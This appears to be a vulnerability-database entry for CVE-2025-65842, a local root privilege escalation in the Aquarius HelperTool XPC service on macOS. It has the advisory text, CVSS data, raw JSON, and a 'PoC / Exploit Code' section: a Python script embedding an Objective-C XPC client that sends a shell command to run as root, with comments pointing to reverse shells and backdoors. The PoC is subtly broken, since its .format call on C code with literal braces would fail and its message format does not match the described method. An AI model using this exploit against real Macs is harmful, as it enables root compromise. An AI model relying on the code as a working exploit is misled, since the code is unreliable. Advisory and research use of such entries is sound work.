Security Vulnerability Report
中文
CVE-2025-65842 CVSS 5.1 MEDIUM

CVE-2025-65842

Published: 2025-12-03 17:15:54
Last Modified: 2025-12-18 20:41:33
Source: [email protected]

Description

The Aquarius HelperTool (1.0.003) privileged XPC service on macOS contains multiple flaws that allow local privilege escalation. The service accepts XPC connections from any local process without validating the client's identity, and its authorization logic incorrectly calls AuthorizationCopyRights with a NULL reference, causing all authorization checks to succeed. The executeCommand:authorization:withReply: method then interpolates attacker-controlled input into NSTask and executes it with root privileges. A local attacker can exploit these weaknesses to run arbitrary commands as root, create persistent backdoors, or obtain a fully interactive root shell.

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:acustica-audio:aquarius_helpertool:1.0.003:*:*:*:*:*:*:* - VULNERABLE
Aquarius HelperTool < 1.0.003
macOS (所有运行受影响HelperTool版本的系统)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65842 PoC - Aquarius HelperTool Local Privilege Escalation Note: This is a proof-of-concept demonstrating the vulnerability concept. Use only in authorized testing environments. """ import subprocess import os def exploit_cve_2025_65842(): """ Exploit the Aquarius HelperTool XPC service vulnerability. The service does not validate XPC client identity and has flawed authorization logic that allows arbitrary command execution as root. """ # Malicious command to be executed with root privileges # In a real attack, this could be: reverse shell, backdoor, etc. malicious_command = "/bin/bash -c 'echo root:0 >> /tmp/pwned && chmod 777 /tmp/pwned'" # XPC connection to the vulnerable service # The service accepts connections from any process without validation xpc_service = "com.aquarius.helpertool" print(f"[*] Attempting to connect to vulnerable XPC service: {xpc_service}") print(f"[*] Sending malicious command: {malicious_command}") # Since this is macOS-specific and requires Objective-C/Swift XPC APIs, # here's the conceptual XPC client code: xpc_client_code = ''' #import <Foundation/Foundation.h> #import <xpc/xpc.h> int main() { xpc_connection_t conn = xpc_connection_create_mach_service( "com.aquarius.helpertool", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED ); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { // Handle connection events }); xpc_connection_resume(conn); // Create malicious message - service doesn't validate sender xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(msg, "command", "{malicious_command}"); // Send message - authorization check bypassed due to NULL reference xpc_connection_send_message(conn, msg); return 0; } '''.format(malicious_command=malicious_command) print("\n[!] XPC Client Code (requires compilation on macOS):") print(xpc_client_code) # For demonstration, show what would happen print(f"\n[+] If vulnerable, the following command would execute as root:") print(f" {malicious_command}") return True if __name__ == "__main__": print("="*60) print("CVE-2025-65842 PoC - Aquarius HelperTool LPE") print("="*60) exploit_cve_2025_65842()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65842", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:54.317", "lastModified": "2025-12-18T20:41:32.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Aquarius HelperTool (1.0.003) privileged XPC service on macOS contains multiple flaws that allow local privilege escalation. The service accepts XPC connections from any local process without validating the client's identity, and its authorization logic incorrectly calls AuthorizationCopyRights with a NULL reference, causing all authorization checks to succeed. The executeCommand:authorization:withReply: method then interpolates attacker-controlled input into NSTask and executes it with root privileges. A local attacker can exploit these weaknesses to run arbitrary commands as root, create persistent backdoors, or obtain a fully interactive root shell."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:acustica-audio:aquarius_helpertool:1.0.003:*:*:*:*:*:*:*", "matchCriteriaId": "9EA89156-5C87-474C-92A2-CDA92F828BAB"}]}]}], "references": [{"url": "https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.